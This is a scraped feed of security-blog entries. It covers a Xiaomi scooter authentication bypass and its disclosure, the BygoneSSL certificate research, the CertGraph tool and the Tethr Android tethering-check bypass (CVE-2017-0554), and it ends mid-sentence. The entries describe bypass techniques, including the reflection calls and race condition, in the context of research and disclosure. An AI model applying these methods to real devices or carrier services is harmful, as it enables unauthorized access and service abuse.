use any of the more advanced features I could use the NineBot or Xiaomi apps with the scooter and provide them the password that my app could read from the scooter to perform any of the more advanced functions.\nDisclosure After finding these issues I disclosed them to all the affected parties I could before making this post and waiting to give them plenty of time to fix the issues.\nXiaomi Luckily Xiaomi runs a bug bounty and the scooter was in scope! I submitted my findings and a copy of my M365-Toolbox app and was eventually rewarded $500 for my finding.\nTimeline December 23rd 2018: Initial disclosure to security@xiaomi.com December 24th 2018: Xiaomi acknowledges and requests POC December 25th 2018: I share POC code and detailed explanation December 29th 2018: Xiaomi confirms they are able to reproduce the vulnerability January 1st 2019: Xiaomi rewards me 4000 RMB (~$500) from their Bug Bounty Spin Spin which used the same hardware was also vulnerable to the same packets to take over their scooters. I had great difficulty finding contact information for anyone to disclose this to. I eventually found the emails for their support and a few of their engineers., and decided to email them all and hope for the best. Unfortunately they where not very responsive and ultimately I was never able to disclose to them. As far as I know they are still vulnerable.\nTimeline January 11th 2019: Initially reached out to Spin to disclose vulnerability January 21st 2019: After no contact, I follow up with some more details and increasing the sense of urgency January 21st 2019: I\u0026rsquo;m told the policy team will each out to me after reviewing my \u0026ldquo;case\u0026rdquo; Radio silence Bird Bird also uses the Xiaomi M365 hardware, but they replace the BLE controller board with what people are calling a Bird Brain. The Bird Brain has a cellular modem and relays all commands through Bird\u0026rsquo;s servers to the user\u0026rsquo;s phone. As a result of this, they are not vulnerable to the attack I describe here, so I did not find it necessary to disclose to them. However a quick glance at their app\u0026rsquo;s decompiled code shows some Bluetooth functionality, so this might be a good area to explorer further.\nOther Related Security Findings In the process of performing my background research on this I ran across this report from IOActive finding a very similar vulnerability in NineBot\u0026rsquo;s Segway product about a year earlier. Since IOActive found and disclosed this NineBot has patched it, which is great! However it is saddening to see that after the disclosure NineBot failed to learn from their mistake and included a very similar vulnerability in other products.\nAfter I reported my findings to Xiaomi Rani Idan found the same vulnerabilities that I did and also reported it to Xiaomi. Xiaomi told them that they already knew of the issue (likely in part due to my report) so Rani decided to release their POC. Even after they released their POC I still felt it was right to wait at least 90 days from my disclosure before releasing mine.\n","permalink":"https://lanrat.com/posts/xiaomi-m365/","summary":"\u003cp\u003eSometime in the first half of 2018 there was an explosion of \u0026ldquo;Dockless e-scooters\u0026rdquo; \u003ca href=\"https://techcrunch.com/story/the-electric-scooter-saga-in-san-francisco/\"\u003eappearing all over the Bay Area\u003c/a\u003e. These devices are electric scooters that anyone can rent for a one-way trip and find/leave them (at the time) anywhere you want. As one could guess this \u003ca href=\"https://www.businessinsider.com/san-francisco-ban-shared-dockless-scooters-2018-5\"\u003eled to lots of issues\u003c/a\u003e but they where convenient and I wanted one of my own so I did a little research onto how to acquire one for private use.\u003c/p\u003e","title":"Xiaomi M365 Scooter Authentication Bypass"},{"content":"M365 Toolbox demonstrates a security vulnerability in the Xiaomi M365 electric scooter\u0026rsquo;s communication protocol. The Java application exploits weaknesses in the scooter\u0026rsquo;s Bluetooth Low Energy (BLE) authentication mechanism to bypass security controls and execute unauthorized commands.\nThe proof-of-concept tool reveals how the scooter\u0026rsquo;s authentication can be circumvented through protocol manipulation, allowing remote control access without proper authorization. This research highlighted critical security flaws in IoT device communication protocols commonly found in consumer transportation devices.\n","permalink":"https://lanrat.com/projects/m365-toolbox/","summary":"\u003cp\u003eM365 Toolbox demonstrates a security vulnerability in the Xiaomi M365 electric scooter\u0026rsquo;s communication protocol. The Java application exploits weaknesses in the scooter\u0026rsquo;s Bluetooth Low Energy (BLE) authentication mechanism to bypass security controls and execute unauthorized commands.\u003c/p\u003e\n\u003cp\u003eThe proof-of-concept tool reveals how the scooter\u0026rsquo;s authentication can be circumvented through protocol manipulation, allowing remote control access without proper authorization. This research highlighted critical security flaws in IoT device communication protocols commonly found in consumer transportation devices.\u003c/p\u003e","title":"M365 Toolbox"},{"content":"A Go library and SOCKS5 proxy server that enables egress traffic from multiple IP addresses within a subnet. Stargate randomly distributes network connections across different IP addresses to avoid rate-limiting and provide load balancing across available IP ranges.\nThe tool works best with subnets directly routed to the host and is particularly powerful for IPv6 subnet utilization. It supports both TCP CONNECT and UDP ASSOCIATE protocols and provides both a standalone proxy tool and a Go library for programmatic random IP networking. Requires specific network routing configuration and primarily supports Linux and FreeBSD platforms due to freebind networking capabilities.\n","permalink":"https://lanrat.com/projects/stargate/","summary":"\u003cp\u003eA Go library and SOCKS5 proxy server that enables egress traffic from multiple IP addresses within a subnet. Stargate randomly distributes network connections across different IP addresses to avoid rate-limiting and provide load balancing across available IP ranges.\u003c/p\u003e\n\u003cp\u003eThe tool works best with subnets directly routed to the host and is particularly powerful for IPv6 subnet utilization. It supports both TCP CONNECT and UDP ASSOCIATE protocols and provides both a standalone proxy tool and a Go library for programmatic random IP networking. Requires specific network routing configuration and primarily supports Linux and FreeBSD platforms due to freebind networking capabilities.\u003c/p\u003e","title":"Stargate"},{"content":"Binary Analog Watch Face is an Android Wear watch face that combines analog time display with binary representation. The watch face uses binary digits to form the hour and minute hands, creating a unique visualization where time is displayed both analogically and in binary format.\nThe watch face features Material Design aesthetics with customizable color themes and optional center complications. The implementation renders traditional analog clock hands using sequences of binary digits, inspired by Anthony Liekens\u0026rsquo;s Analog Binary Wall Clock concept.\n","permalink":"https://lanrat.com/projects/binary-analog-watch-face/","summary":"\u003cp\u003eBinary Analog Watch Face is an Android Wear watch face that combines analog time display with binary representation. The watch face uses binary digits to form the hour and minute hands, creating a unique visualization where time is displayed both analogically and in binary format.\u003c/p\u003e\n\u003cp\u003eThe watch face features Material Design aesthetics with customizable color themes and optional center complications. The implementation renders traditional analog clock hands using sequences of binary digits, inspired by Anthony Liekens\u0026rsquo;s Analog Binary Wall Clock concept.\u003c/p\u003e","title":"Binary Analog Watch Face"},{"content":"This is the blog version of my DEFCON 26 talk Lost and Found Certificates: dealing with residual certificates for pre-owned domains, which I co-presented with Dylan Ayrey.\nYou can learn more about BygoneSSL and see a demo at insecure.design.\nThe Problem A Certificate can outlive the ownership of a domain.\nIf the domain is then re-registered by someone else, this leaves with the first owner with a valid SSL certificate for the domain now owned by someone else.\nThe above diagram illustrates an example where Alice registers foo.com for 1 year, and gets a 3 year SSL certificate from a trusted Certificate Authority. Alice then decides not to renew the domain (or possibly forgets) and after one year the domain expires. Some time later Bob registers foo.com and because Bob is on top of all the latest security trends, he also gets a SSL certificate to protect the traffic to his new domain. Little does he know, that Alice, malicious or not, still has a valid SSL certificate for what is now Bob\u0026rsquo;s domain. This is a problem we are calling BygoneSSL.\nWhat can Bob do?\nUntil recently it was not even possible for Bob to determine if there exists prior certificates for his domain. However, now we have Certificate Transparency.\nCertificate Transparency Certificate Transparency (CT) was designed to catch bad or misbehaving Certificate Authorities (CAs). Anyone can run a CT Log server, which is a publicly auditable log of certificates that anyone can submit to. At the time of writing there are about 1/2 billion certificates in public CT logs and growing.\nCT is required for all certificates issued after April 2018 to be trusted. Many certificates issued before April are also in the logs, but is is not requires.\nFor more information on Certificate Transparency, see my CertGraph post or the Certificate Transparency site.\nFinding Pre-existing Certificates Knowing the registration date of a domain, you can search CT logs for certificates issued before the registration date, and valid after. However there is no guarantee that all Certificates issued before April 2018 will be found. So you may not have a complete picture, but it is as close as we can get.\nAn Example: stripe.com stripe.com is an excellent example of this. Stripe is a major online payment processor. They acquired their domain name in 2010 from a domain parking service. However there exists a certificate issued in 2009 that is valid until 2011, over a year into Stripe\u0026rsquo;s ownership of stripe.com.\nWhy is this a problem? Well, aside from the fact that the previous domain owner could Man-in-the-Middle the new domain owner\u0026rsquo;s SSL traffic for that domain, if there are any domains that share alt-names with the domain, they can be revoked, potentially causing a Denial-of-Service if they are still in use. More on this below.\nBygoneSSL Definition noun A SSL certificate created before and supersedes its domains\u0026rsquo; current registration date.\nBygoneSSL Man in the Middle If a company acquires a previously owned domain, the previous owner could still have a valid certificates, which could allow them to MitM the SSL connection with their prior certificate.\nThe above stripe.com is an example of a potential BygoneSSL Man in the Middle.\nBygoneSSL Denial of Service If a certificate has a subject alt-name for a domain no longer owned by the certificate user. It is possible to revoke the certificate that has both the vulnerable alt-name and other domains. You can DoS the service if the shared certificate is still in use!\nRevoking The CA/Browser Forum, which sets the rules by which Certificate Authorities and Browsers should operate, states that if any information in a certificate becomes incorrect or inaccurate, it should be revoked. Additionally if the domain registrant has failed to renew their domain, the CA should revoke the certificate within 24 hours.\nDoS example: do.com do.com has had many owners in the past few years, some of which added the domain to their SSL certificates. However in this particular case, the certificate hosting salesforce.com listed do.com as an alt-name. Even after do.com was transferred to another owner.\nDue to the regulations set by the CA/B forum, this certificate could be revoked, causing downtime for the users of salesforce.com.\nThe above screenshot is of CertGraph, a tool I wrote to identify related domains through linked certificate alt-names; showing how salesforce.com is linked to squarespace.com through the do.com alt-name in the certificate past Salesforce\u0026rsquo;s ownership of the domain.\nHow big is this issue? In order to get an idea of how many BygoneSSL certificates might still be out there We performed an analysis on over 3 million random domains and their 7.7 million SSL certificates. This sample makes up about 1% of the Internet\u0026rsquo;s domains.\nTo determine if a domain has been transferred, We searched historical WHOIS, Name Servers, and the WayBack Machine. Since there are many reasons a domain\u0026rsquo;s WHOIS, Name Servers, or site may change, We intentionally weighted the algorithm to favor false negatives over false positives. It is not perfect, there are MANY false negatives and quite a few false positives, but it does give a glimpse into the scale of the problem.\nDomains Directly Affected (MitM) A domain is directly affected if there exists a certificate that was created before its registration date, and valid after. In the random sampling of domains studied, We found that 0.45% meet this criteria. This might seem like a small number, but the Internet is huge which puts this at around 1.5 Million domains. Of the certificates sampled that are affected, 25% are still valid and can be used today by the prior domain owner.\nDomains Affected by Alt-Names (Dos) A domain is affected by an alt-name if it shared a certificate with a domain that is directly affected. These domains can be Denial of Serviced like the above do.com example. Of the domains studied, 2.05% are affected by sharing a certificate with an alt-name. This is represents 7 Million domains on the entire Internet, a 4x increase over the previous MitM finding. Of the certificates affected, 41% are still valid. Meaning they can be revoked and if still in use will cause breakage!\nWhat should be done about this? If you find a certificate that is still in use that has an alt-name that is no longer under control of the certificate owner you should notify them. Bonus points if they have a bug bounty and you mention BygoneSSL. If not, how much notice should you give? The CAs should revoke in under 24 hours of being notified; however many of them take up to weeks, so it is best to give as much notice as possible to prevent being disruptive.\nProtecting your own Domains First search CT for BygoneSSL certificates for your domains. If you find any, reach out to the issuing CA\u0026rsquo;s and request that they be revoked. If the certificates have alt-names that are still in use, you should give the other domain owners a heads up as well in case they are still using the certificates.\nNext you should setup your servers to use the Expect-CT header in enforce mode to prevent any SSL certificates that are not in CT from being valid for your domains. Unfortunately this will only work for visitors whose first connection to your site is not MitM. Next you need to continue monitoring CT logs in case an older cert gets added later. Certificates can be added to CT logs at any time, not just when they are issued. Be sure to check for alt-names as well. You don\u0026rsquo;t want someone sitting on a certificate to start using it once they submit it years later. We\u0026rsquo;ve written a few tools to help you do this mentioned in the next section.\nFixing the problem for the Internet It would be great if domain registrars did not issue certificates valid for longer than the current domain\u0026rsquo;s registration. If you could not get a SSL certificate for longer than your domain registration this problem is drastically reduced, excluding transfers, which the new domain owner should expect that the prior owner may have a pre-existing certificate.\nCA\u0026rsquo;s should only issue short-lived certificates. We are making progress on this. New 10 and 5 year certificates are no longer valid. The current maximum life for a certificate is 825 days, which is just over 2 years. There is ongoing work to reduce this even further, with Let\u0026rsquo;s Encrypt leading the way with 90 day certificates!\nDomain registrars could show you pre-existing valid certificates logged in CT when registering or transferring a domain. This gives the domain owner visibility into the potential BygoneSSL certificates that may exist before they could do any damage.\nTools CertGraph CertGraph can also be used to detect BygoneSSL MitM and Dos. For MitM use certgraph normally and look for cases where your graph of domains reached domains or certificates that you do not control.\nFor DoS, use certgraph with the following options:\ncertgraph -depth 1 -driver google -ct-subdomains -cdn [DOMAIN]... A future version of CertGraph will include a -bygonessl flag to automate this and add more features, such as domain availability checks.\nCertSpotter CertSpotter is a free and open source Certificate Transparency Log Monitor by SSLMate. I\u0026rsquo;ve added support for detecting BygoneSSL certificates and got it merged upstream. It works the same, but you can add a valid_at date to the watch-list.\nFor example, the following watch-list would find the BygoneSSL certificate for insecure.design registered on April 18th 2018.\ninsecure.design valid_at:2018-04-18 defcon.org valid_at:1993-06-21 wikipedia.org valid_at:2001-01-13 toorcon.net valid_at:2012-03-13 Since this is a full Certificate Transparency Log Monitor. It will take some time to go through the backlog of certificates on the remote logs on its first run.\nBygoneSSL Facebook Search Tool Dylan also wrote a similar tool to search Facebook\u0026rsquo;s Certificate Transparency Monitor. It requires Facebook OAuth, but is much faster because it does not need to inspect an entire log. You can find it here: https://github.com/dxa4481/bygonessl.\nDefcon Recording CA \u0026amp; Browser Forum Presentation ","permalink":"https://lanrat.com/posts/bygonessl/","summary":"\u003cp\u003eThis is the blog version of my DEFCON 26 talk \u003ca href=\"https://www.defcon.org/html/defcon-26/dc-26-speakers.html#Foster\"\u003eLost and Found Certificates: dealing with residual certificates for pre-owned domains\u003c/a\u003e, which I co-presented with \u003ca href=\"https://security.love\"\u003eDylan Ayrey\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eYou can learn more about BygoneSSL and see a demo at \u003ca href=\"https://insecure.design\"\u003einsecure.design\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eA Certificate can outlive the ownership of a domain.\u003c/p\u003e\n\u003cp\u003eIf the domain is then re-registered by someone else, this leaves with the first owner with a valid SSL certificate for the domain now owned by someone else.\u003c/p\u003e","title":"BygoneSSL - dealing with residual certificates for pre-owned domains"},{"content":"CZDS is a Go library and CLI tool for interacting with ICANN\u0026rsquo;s Centralized Zone Data Service API. It handles authentication, zone file downloads, request submissions, and status monitoring for accessing top-level domain zone data.\nThe implementation supports parallel downloads, request management, and provides both library interfaces for Go applications and standalone command-line functionality. The tool automates the process of requesting and retrieving DNS zone files from ICANN\u0026rsquo;s centralized service.\n","permalink":"https://lanrat.com/projects/czds/","summary":"\u003cp\u003eCZDS is a Go library and CLI tool for interacting with ICANN\u0026rsquo;s Centralized Zone Data Service API. It handles authentication, zone file downloads, request submissions, and status monitoring for accessing top-level domain zone data.\u003c/p\u003e\n\u003cp\u003eThe implementation supports parallel downloads, request management, and provides both library interfaces for Go applications and standalone command-line functionality. The tool automates the process of requesting and retrieving DNS zone files from ICANN\u0026rsquo;s centralized service.\u003c/p\u003e","title":"CZDS"},{"content":"Certgraph is a tool I\u0026rsquo;ve been developing to scan and graph the network of SSL certificate alternative names. It can be used to find other domains that belong to an organization that may be several orders removed and not always obvious.\nBackground The idea for this project came about after examining the SSL certificate for XKCD.com. If you look closely at the screenshot below you will see that the SSL certificate used on XKCD.com is also valid for many of domains which have no relationship to XKCD or Randall Munroe.\nThis behavior is a side-effect of the CDN used by XKCD, in this case, Fastly. Fastly is putting many of their clients on the same certificate, likely in an effort to simplify their deployment. This works because SSL certificates can use the \u0026ldquo;Certificate Subject Alternative Name\u0026rdquo; extension to add a list of additional hosts that the certificate should be valid for in addition to the primary name specified in the certificate.\nThere can also be many certificates issued for a single domain. This creates a many-to-many relationship between certificates and domains; An ideal target to graph.\nCertificate Transparency Certificate Transparency logs provide an additional and excellent source of SSL certificates to query. Instead of connecting to each host to get its certificate, we can get them all from a single log or index.\nCertificate Transparency Background Flaws in the current system of digital certificate management were made evident by high-profile security and privacy breaches caused by fraudulent certificates being issued by \u0026ldquo;trusted\u0026rdquo; CAs. The goal of Certificate Transparency is to provide an open auditing and monitoring system that lets any domain owner or certificate authority determine whether their certificates have been mistakenly issued or maliciously used. Certificate Transparency allows domain owners to be notified whenever a certificate is issued for their domain informing them of any unauthorized certificates that may exist. In near real time!\nThe actual Certificate Transparency logs are hundreds of gigabytes in size and not indexed, so searching them is not ideal, however, there are public Certificate Transparency search engines that index all of the data for us so we can query it.\nComodo\u0026rsquo;s crt.sh Google Facebook Unfortunately Facebook\u0026rsquo;s tool requires you to be logged into a Facebook account to use it. But it does send you instant notifications whenever it detects a new certificate issued for a domain you are monitoring.\nCertGraph Examples Subdomain Enumeration There are lots of subdomain enumeration tools already (for example Sublist3r), but they all work by either brute-forcing domains, or by searching indexes like Google. CertGraph can also help enumerate subdomains, but much faster and with much more accuracy. This is because every domain CertGraph encounters is known to be a valid domain. Although CertGraph may not encounter every subdomain, it should have no false-positives.\nNote For best results use a Certificate Transparency driver with the -ct-subdomains flag.\nInternal Domain leakage CertGraph can help enumerate all domains that you may not know are publicly listed inside your certificate alt-names. This can sometimes lead to certificates that are valid for both internal and external hosts being guessed externally, sharing the internal host names with the public. Below is an example of this.\n$ certgraph -driver crtsh -ct-subdomains netflix.com | grep internal staging-npp-internal.netflix.com issues-internal.nrd.netflix.net dev-npp-internal.netflix.com npp-internal.netflix.com api-internal.test.netflix.com api-int-internal.netflix.com api-int-internal.test.netflix.com ... Misconfigured Certificates The graph visualization that CertGraph can output can be thought of as a trust graph. If a certificate is valid for one domain, which is being hosted with a cert for another domain, we can say that the second domain must trust the owner of the first domain, as they have the certificate for it. This idea can be expanded and chained to incorporate many certificates. If your graph includes many domains which should not have any trust relationship with you, this may indicate a problem.\nBelow is a real example of this, with the domains changed to red, green, and blue to make it more obvious and to protect the guilty.\n$ certgraph -json blue.com \u0026gt; data.json\nIn this example Red, Green, and Blue are all different organizations, and we run certgraph on only blue.com, which enumerated a handful of Blue\u0026rsquo;s other domains and certificates. However, somehow certgraph ended up reaching green.com and then red.com. How is this possible? It turns out blue.com was serving a SSL certificate for green.com in an alt-name and www.green.com had an ssl certificate for red.com.\nAfter some digging I learned that Blue previously owned green.com and sold it to Red. But Blue still possesses a valid SSL certificate for green.com and is serving it from blue.com. At this point Blue can SSL man-in-the-middle Red\u0026rsquo;s green.com domain. Take a minute to let that sink in.\nCDNs If any of the crawled domains use a CDN, CertGraph will skip the CDN certificate by default. CDN certificates may contain hundreds of unrelated alt-names introducing lots of unwanted noise into the data. The -cdn flag causes CertGraph to include CDN results in the search instead of skipping them.\nHow CertGraph Works Currently CertGraph supports 4 different drivers, which are the way CertGraph searches and acquires certificates for domains.\nhttp this connects to domains on port 443 and collects the certificate from the TLS handshake. smtp like http, but looks up the MX records of the domains and uses port 25 with starttls. crtsh searches Certificate Transparency using crt.sh google like crtsh but uses Google\u0026rsquo;s Certificate Transparency search tool Methodology Under the hood, CertGraph is rather simple. It uses a modified Breadth-first search to allow it to crawl the graph while it is being created, and in parallel.\nWildcard domains are normalized to their parent domain. Unfortunately this is required because we do not know which subdomain host to connect to. Example: *.example.com → example.com\nCertgraph also has a few output modes:\nDomain list - list all the domains found, 1 per line as they are found (default) Domain adjacency list - prints more details such as host status, domain\u0026rsquo;s certificate hash, and depth from root in graph (-details flag) JSON Graph - JSON output for graphing on the Web UI (-json flag) Save Certificates - Save the certificates in PEM format for later analysis (-save flag) Examples Basic usage:\n$ ./certgraph -list eff.org eff.org staging.eff.org leez-dev-supporters.eff.org micah-dev2-supporters.eff.org maps.eff.org web6.eff.org https-everywhere-atlas.eff.org s.eff.org max-dev-supporters.eff.org httpse-atlas.eff.org kittens.eff.org dev.eff.org max-dev-www.eff.org atlas.eff.org The domain adjacency list is printed in the following format:\nNode Depth Status Cert-Fingerprint [Edge1 Edge2 ... EdgeN]\n$ ./certgraph -details eff.org eff.org 0 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [maps.eff.org web6.eff.org eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org] web6.eff.org 1 Good AF842FA69A720E9FB2F37BAF723A20F80B8C2072693E55D0A1EA78C7BABE2699 [*.eff.org *.dev.eff.org *.s.eff.org *.staging.eff.org] https-everywhere-atlas.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [kittens.eff.org maps.eff.org web6.eff.org eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org] maps.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [maps.eff.org web6.eff.org eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org] atlas.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org maps.eff.org web6.eff.org] httpse-atlas.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org maps.eff.org web6.eff.org] kittens.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org maps.eff.org web6.eff.org] dev.eff.org 2 No Host [] s.eff.org 2 Good AF842FA69A720E9FB2F37BAF723A20F80B8C2072693E55D0A1EA78C7BABE2699 [*.eff.org *.dev.eff.org *.s.eff.org *.staging.eff.org] staging.eff.org 2 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org] leez-dev-supporters.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [staging.eff.org max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org] micah-dev2-supporters.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org] max-dev-supporters.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org] max-dev-www.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org max-dev-supporters.eff.org leez-dev-supporters.eff.org] Web Interface CertGraph also includes a simple web interface for easy visualization of the graph. It can be accessed online at https://lanrat.github.io/certgraph or offline in the docs folder in the program source code.\nThe web UI is a single page web interface that can visualize the graph output when using the -json flag. It can be run entirely offline.\nExample: $ certgraph -json example.com \u0026gt; example-graph.json\nYou can load your data into the web interface by uploading, pasting, or linking to a JSON file using the data dropdown menu.\nFor more information and examples, checkout the project README on GitHub\nShmoocon 2018 Talk ","permalink":"https://lanrat.com/posts/certgraph/","summary":"\u003cp\u003e\u003ca href=\"https://github.com/lanrat/certgraph\"\u003eCertgraph\u003c/a\u003e is a tool I\u0026rsquo;ve been developing to scan and graph the network of SSL certificate alternative names. It can be used to find other domains that belong to an organization that may be several orders removed and not always obvious.\u003c/p\u003e\n\u003ch1 id=\"background\"\u003eBackground\u003c/h1\u003e\n\u003cp\u003eThe idea for this project came about after examining the SSL certificate for \u003ca href=\"https://xkcd.com\"\u003eXKCD.com\u003c/a\u003e. If you look closely at the screenshot below you will see that the SSL certificate used on XKCD.com is also valid for many of domains which have no relationship to XKCD or \u003ca href=\"https://en.wikipedia.org/wiki/Randall_Munroe\"\u003eRandall Munroe\u003c/a\u003e.\u003c/p\u003e","title":"CertGraph"},{"content":"On most unrooted, stock, Android phones, enabling tethering will run a \u0026ldquo;Provisioning Check\u0026rdquo; with your wireless provider to ensure that your data plan allows tethering. This post documents Tethr, a way to bypass the provisioning check on Android devices prior to version 7.1.2. After discovering this method I reported it to the Android bug bounty fixing the issue and receiving CVE-2017-0554.\nBackground The ability to tether is controlled by your device\u0026rsquo;s build.prop file, usually located at /system/build.prop. The default is to require the provisioning check before enabling tethering, but it can by bypassed by adding the following line:\nnet.tethering.noprovisioning=true Unrooted devices can\u0026rsquo;t edit /system/build.prop, so it is up to the ROM manufacturer to set this property. Some devices like the Google Nexus 6P default to net.tethering.noprovisioning=true. But this is an exception and not the norm. The Google Nexus 5X, Pixel, and Pixel 2 all perform provisioning checks.\nOverview When enabling tethering on Android, the OS will first do a provisioning check with the carrier to determine if the user\u0026rsquo;s plan allows tethering. If allowed, tethering is enabled, otherwise a message is displayed to the user.\nIf there is no sim card inserted then no provisioning check is performed, and tethering is allowed. Additionally, if tethering is enabled on a phone with no sim (not that this scenario would be of much use) and a SIM is then inserted, tethering is disabled as it should be.\nHowever, if tethering is enabled while the radio is connecting, no provisioning check will be performed, and tethering will remain enabled after the radio connection is established.\nThe first issue I discovered is the ability for a user-installed application on a stock OS to reset the cellular modem. The second issue is the lack of a provisioning check once the cellular modem has finished reconnecting.\nTogether these bugs allow the Android OS to operate as if net.tethering.noprovisioning=true were specified in build.prop, even if it is not.\nTethr Demo Before I dive into the details, observe the following video which demonstrates when enabling tethering in the Android system UI, a provisioning check is performed and tethering is not allowed. Then when using the Tethr demo app, the signal meter loses signal when the modem is resetting, and then tethering is successfully enabled.\nSource code: github.com/lanrat/tethr\nCompiled APK: Tethr.apk\nIssue 1: Resetting radio via reflection Java Reflection in Android can be used to allow application code to make calls to undocumented, or hidden APIs. This is not officially supported, and often strongly discouraged. It can however, allow app developers to do unsupported things, or in this case, bypass a permission check.\nResetting the cellular radio is performed in CellRefresh.java by calling CellRefresh.Refresh(). CellRefresh does a number of things to reset the cellular connection on most Android versions, but on Android 6+ the following reflections are used:\ngetSystemService(Context.TELEPHONY_SERVICE).getITelephony().setCellInfoListRate() getSystemService(Context.CONNECTIVITY_SERVICE).mService.setMobileDataEnabled(); Older Android versions use the following reflections:\ngetSystemService(Context.CONNECTIVITY_SERVICE).mService.setRadio(); getSystemService(Context.TELEPHONY_SERVICE).getITelephony().disableDataConnectivity() getSystemService(Context.TELEPHONY_SERVICE).getITelephony().enableDataConnectivity() Solution The methods used should require the application to have the system or privileged permissions.\nIssue 2: Tethering provisioning check race condition In order to exploit the race condition and bypass the tethering provisioning check an Android PhoneStateListener and AccessibilityService are used to programmatically enable the desired tethering mode at exactly the right time.\nFirst the network is reset as described above. While the reset is being performed the PhoneStateListener (TetherPhoneStateListener.java) listens for when the cellular network is down and then starts the system\u0026rsquo;s settings tethering dialog where the AccessibilityService (TetherAccessibilityService.java) finds the correct UI switch and toggles it.\nThe AccessibilityService and PhoneStateListener are not strictly required for this exploit. The user can manually toggle tethering at the correct time to have the same effect. Automating the process with an AccessibilityService makes the process easier to reproduce.\nSolution The provisioning check should happen each time the radio is reset when tethering is enabled in addition to checking when enabling tethering.\nTesting Tested Wireless Carriers:\nVerizon AT\u0026amp;T Tested phones (all stock, locked bootloaders, OEM OS):\nNexus 5X running Android 6.0.1 Nexus 5X running Android 7.0.0 Nexus 5X running Android 7.1.1 Samsung Galaxy S7 running Android 6.0.1 Untested but should also work on:\nPixel (XL) Other non-nexus devices that perform a provisioning check As the Nexus 6P already has net.tethering.noprovisioning=true set in its stock build.prop there is no need for this exploit.\nFixes After submitting to the Android Bug Bounty Google created two patches for Android 7.1.2 which fixed this issue.\nPatch 1: Added permission check for setCellInfoListRate\nPatch 2: Fixed the logic for tethering provisioning re-evaluation\nAfter fixing the issue Google was kind enough to give me a Pixel XL for reporting it to their bug bounty.\n","permalink":"https://lanrat.com/posts/tethr/","summary":"\u003cp\u003eOn most unrooted, stock, Android phones, enabling \u003ca href=\"https://support.google.com/nexus/answer/2812516?hl=en\"\u003etethering\u003c/a\u003e will run a \u0026ldquo;Provisioning Check\u0026rdquo; with your wireless provider to ensure that your data plan allows tethering. This post documents \u003cstrong\u003eTethr\u003c/strong\u003e, a way to bypass the provisioning check on Android devices prior to version 7.1.2. After discovering this method I reported it to the Android bug bounty fixing the issue and receiving \u003ca href=\"https://source.android.com/security/bulletin/2017-04-01#eop-in-telephony\"\u003eCVE-2017-0554\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Tethr Screenshot\" loading=\"lazy\" src=\"/posts/tethr/images/Tethr-Screenshot-small.webp\"\u003e\u003c/p\u003e\n\u003ch1 id=\"background\"\u003eBackground\u003c/h1\u003e\n\u003cp\u003eThe ability to tether is controlled by your device\u0026rsquo;s \u003ccode\u003ebuild.prop\u003c/code\u003e file, usually located at \u003ccode\u003e/system/build.prop\u003c/code\u003e. The default is to require the provisioning check before enabling tethering, but it can by bypassed by adding the following line:\u003c/p\u003e","title":"Tethr: Android Tethering Provisioning Check Bypass (CVE-2017-0554)"},{"content":"Tethr is an Android application that demonstrates CVE-2017-0554, a vulnerability that allows bypassing carrier tethering provisioning checks on unrooted devices. The proof-of-concept app exploits system property manipulation to enable mobile hotspot functionality without carrier approval.\nThe vulnerability affects Android versions prior to 7.1.2 by allowing modification of tethering-related system properties through reflection and system service manipulation. This research was conducted to highlight security weaknesses in Android\u0026rsquo;s tethering permission model.\n","permalink":"https://lanrat.com/projects/tethr/","summary":"\u003cp\u003eTethr is an Android application that demonstrates CVE-2017-0554, a vulnerability that allows bypassing carrier tethering provisioning checks on unrooted devices. The proof-of-concept app exploits system property manipulation to enable mobile hotspot functionality without carrier approval.\u003c/p\u003e\n\u003cp\u003eThe vulnerability affects Android versions prior to 7.1.2 by allowing modification of tethering-related system properties through reflection and system service manipulation. This research was conducted to highlight security weaknesses in Android\u0026rsquo;s tethering permission model.\u003c/p\u003e","title":"Tethr"},{"content":"For those of you not in the know, ambergris is defined as:\na wax-like substance that originates as a secretion in the intestines of the sperm whale, found floating in tropical seas and used in perfume manufacture.\nHowever, that will not be what this post is about (sorry to disappoint). Instead, I\u0026rsquo;ll present what happens when building an image on Docker that contains a reverse 